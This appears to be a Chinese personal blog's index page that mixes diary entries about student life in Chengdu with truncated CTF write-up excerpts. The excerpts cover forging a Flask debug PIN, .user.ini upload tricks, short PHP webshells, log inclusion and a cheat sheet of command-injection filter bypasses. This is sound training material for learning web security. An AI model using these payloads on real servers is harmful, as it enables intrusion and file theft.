一篇流水账————那些流经我的回忆-16
灭虫与宜居 这天晚上,正在寝室无所事事,突然花猪敲门,以近乎哭腔的语调请求我帮他们灭虫。他们的寝室有一只大拇指大小的蟑螂,竟然轻易困住了两个一米八有余的汉子。借来扫帚,扫晕了蟑螂,为了尽可能消除卵的影响,我选择将它冲进下水道。按理说,这种尺寸的蚊虫在北方可算是珍奇物种,很久以前爷爷家就闹过蟑螂,但大小绝对不超过小拇指甲盖,小时候甚至把它们收集起来,用药瓶装起来把玩。
没来过川渝的人总喜欢将这里的蚊虫如此之大也作为这里很宜居的一大佐证,但我认为事实并非如此。表妹第一次来四川,就对这里的酷暑与潮湿表达了强烈抗议,联想到我在大学报道那年,也因为这里潮热的气候表示过抗议,很明显这不是北方人口中所说的乌托邦。
“习惯一段时间,就好了。”我说。
【CTFSHOW】 web入门-常用姿势
web801计算Flask的pin码 pin码是flask在开启debug模式下,进行代码调试模式所需的进入密码,需要正确的PIN码才能进入调试模式,可以理解为自带的webshell
计算pin码需要以下几个信息:
1.username 在可以任意文件读的条件下读 /etc/passwd进行猜测2.modname 默认flask.app3.appname 默认Flask4.moddir flask库下app.py的绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量5.uuidnode mac地址的十进制,任意文件读 /sys/class/net/eth0/address6.machine_id 机器码 这个待会细说,一般就生成pin码不对就是这错了题目给的入口可以访问系统文件(那直接访问flag不就行了),通过这个可以获知以上信息。
在python3.6版本中,计算pin的部分算法采用了md5,3.8后换为sha1。这里的python环境为3.8
1234567891011121314151617181920212223242526272829303132333435363738 ...
一篇流水账————那些流经我的回忆-15
上班暂停(?),回家 八月刚刚过去几天,因为实在忍受不了学校的艰苦环境,紧急买了票,将所有工作托付在线上,决定回家。仓促做出的决定总得付出对应的代价——我的选择只剩下20h小时硬座,或者在兰州的凌晨独自消磨掉4小时,再挤上凌晨回家的第二趟转乘车。
我选择了后者。低苦艾乐队的《兰州兰州》有句词说明了这种情况,方便回家的火车总在清晨(严谨一点,其实是凌晨)出走。我是晚上12点整到兰州的,第二程车4点才来,所以去哪消磨时间就成了问题。在火车站附近找到一家还在亮灯的凉皮馆子,要了一份凉皮,坐了下来。
可没坐多久,店里就成了这个样子:
我很识趣,为了让店员能够早些打烊下班,我很快打扫完了凉皮,又徘徊到车站附近。最近在读《人生海海》,小说中描述的上世纪五六十年代生活在农村的人们对环境没有一点挑剔,当又看到在兰州火车站附近睡在广场树荫下的大叔时我便又想到小说中描述的那些小人物,好像一株野草,随便栽在哪里都能过活。车站候车室里也有不少横七竖八、以各种意想不到姿势偷时间睡觉的人——为什么是偷时间睡觉呢?我想是因为忙着生存的人们不一定会 ...
【CTFSHOW】 web入门文件上传
web151前端验证文件格式,抓包改包。
web152说是后端提供了校验,但是抓包改包也可。
web153.user.ini实际上就是一个可以由用户“自定义”的php.ini
在其中添加如下选项可以包含一些文件:
1auto_prepend_file=01.png
若该目录下存在合法的php文档则会自动包含这个gif文件。恰好,本地是黑名单过滤。
首先通过前两题同样的方法将.user.ini文件上传,再直接上传改了后缀名的🐎。
web154黑名单过滤了上传文件中不能有php,但是大小写可以绕过,其他同上。
web155黑名单过滤,不区分大小写,但是可以用短标签
web156在之前的基础上过滤了中括号[]
用大括号代替之。
web157 158过滤了{} []=
直接写命令
123<? system("nl ../fl*")?>
web159过滤了system flag等字样
反引号绕过:
web160日志包含,包含一下日志文件:
1<?=include"/var/lo" ...
一篇流水账————那些流经我的回忆-14
乱七八糟地记一记吧 六月底,七月初,明明没做什么事但就是很疲惫,随便挑一些照片来记一记吧。
泠师傅回家了,所以我回到了独来独往的状态。
从泠师傅室友那淘到了一辆电动车,好处是不用在成都最暑热的时候骑车了,坏处是每周都得去充电,充电的地方密林覆盖,是蚊虫肆虐严重的小角落。在泠师傅的叮嘱下紧急购置驱蚊水,虽然效果聊胜于无,但好歹有个心理安慰。
在咕噜的眼中,自己导师的名字永远都是那么耀眼。
本周吃了高达两次麦当劳,原因竟然是10元吃堡活动。
许久不见的表妹来了成都,带她们大概转了转,就回来加班了。为了向北方人证明在被高温热死和被蚊子咬死之间的取舍有多困难,我不得不现身说法,顺便可以防晒。
蜀中暴雨 书中告别
今天四川省发布了暴雨预警,基本上确定了未来半个月的气候——潮湿、闷热。表妹今天回家,表示从四川出去后天都晴了。
在地铁上读完了《树上的男爵》后面的两章,卡尔维诺大概是这样描述主角母亲的离世:“老母亲是个老将军,从不喜欢自己儿子们玩肥皂泡,等自 ...
【CTFSHOW】 web入门-其他
仅作记录,从这里开始是因为这些题传get参数就行
12345678910111213141516<?php$url = 'http://username:password@hostname/path?arg=value#anchor';print_r(parse_url($url));echo parse_url($url, PHP_URL_PATH);?>结果----------------------------------------------------------------------------------------------------Array([scheme] => http[host] => hostname[user] => username[pass] => password[path] => /path[query] => arg=value[fragment] => anchor)
web39612345678910111213141516171819202122<?p ...
一篇流水账————那些流经我的回忆-13
与阿泠(六) 今天是六月七号,星期五,天气多云转阴。按照安排,今天是学院一年一度的毕业季“草坪音乐节”活动,很久之前就听说这个活动正在被筹办,于是早早报了名——我打算在这天弹唱赵雷的《程艾影》。此外,在一周前,我还接了另一个活——主持人。 但这次不一样,学院打算“买一送一”,于是,阿泠也凭借毕业生的身份顺理成章地成为了我的搭档(事实上,毕业生的身份因素不占大头捏~~)。
《程艾影》是一首情歌,从歌词就能看得出来。我的表演略显尴尬:先是因为自重不断下坠的话筒支架,我不得不用腿挡住他以防话筒掉下来砸坏听众们的耳朵;后是因为腿部的疲惫而逐渐变形的气息;再然后,是忘词(检讨!我讨厌一切需要背的东西)。
但这些都不重要,重头戏在于我准备下场时。作为主持人的阿泠阻止了我下台,临场发挥了一段:
“哎,先别急着下台,我们还有个采访环节。你觉得,今晚的活动中,是什么让你心荡漾呢?”
“当然是你呀!”
我是个i人,但是回答阿泠时没有一点犹豫,这或许会是我转e的流程之一?
河西走廊是地球深陷 ...
一篇流水账————那些流经我的回忆-12
骡马假日 今日五一劳动节,按道理讲是五一小长假的第一天,在空间刷到了老友留在实验室加班的消息,刚刚打算嘲讽,就收到了导师要求加个班的要求。
晚上从办公室出来,已是9点余钟,雨很大。下图为泠师傅拍到的小瀑布:
与阿泠(三)
五四青年节,立夏前夕。按照一个多月前的计划,今天是和泠师傅一起来见毛不易的日子(确切的说,是仙人掌音乐节,除了毛不易之外还有很多歌手,但大部分我都叫不上来名字,但我能说我是毛不易的铁粉)。我们早早跟着某红薯做好了攻略,买了折叠椅,备了软装水,但真正到了现场,却发现一样也不能带进去,于是,在入口处的寄存处草草寄存了物件,打着遮阳伞进了现场。
现场位于非遗博览园,在一大片空地上搭着平行的两个舞台,受邀前来的歌手在两个舞台轮流亮相。我不懂乐理,但开始时的几个乐手曲风都偏向流行乐的摇滚风格,曲风大同小异,内容都是唱着青春和梦想。但坦白说,现场的氛围还是与耳机中听到的不一样,我与舞台相隔约300米,仍然感到音响设备震得我每个器官都在震颤,而舞台正下方的一群观众,还能跟着鼓点跳起来。
...
【CTFSHOW】 web入门php特性一(100-108)
Web100&101考点:
PHP中逻辑与的两种形式:AND 和 &&,同样逻辑或也有对应的两种表达:OR 和 || 。但两种表达的优先级存在不同,AND和OR优先级低于=。以下段代码为例:
123456789101112$bA = true;$bB = false;$b1 = $bA and $bB;$b2 = $bA && $bB;var_dump($b1); // 输出$b1 = truevar_dump($b2); // 输出$b2 = false$bA = false;$bB = true;$b3 = $bA or $bB;$b4 = $bA || $bB;var_dump($b3); // 输出$b3 = falsevar_dump($b4); // 输出$b4 = true
因此本题目只需要确保v1是数字型即可使v0为true。
ReflectionClass具体使用方法可以参考php官网:https://www.php.net/manual/zh/class.reflectionclass.php本题例出两个解1paylo ...
命令执行绕过总结
写在前面关于命令执行的绕过方法,前人之述备矣。此篇文章只是根据本人刷题经验以及大佬们的博客做一总结。希望可以帮到广大爱好CTF的入门师傅们 ^_^
对于关键字过滤的绕过转义符号绕过用于对cat flag等关键字的过滤
1ca\t fl\ag
空变量123ca$*t flagca$@t flagca${3}t flag
反引号1echo `nl flag`
通配符(正则)1cat ?la?
附上一张匹配表
字符
解释
*
匹配任意长度的字符
?
匹配单个字符
[list]
匹配list内的单个字符
[^list]或[!list]
匹配list之外的单个字符
{str1,str2…}
匹配指定字符串
拼接变量1a=fl;b=ag;cat $a$b
使用其他漏洞绕过如文件包含漏洞(需要题目存在相关可利用漏洞)
1c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
编码绕过1`echo 'Y ...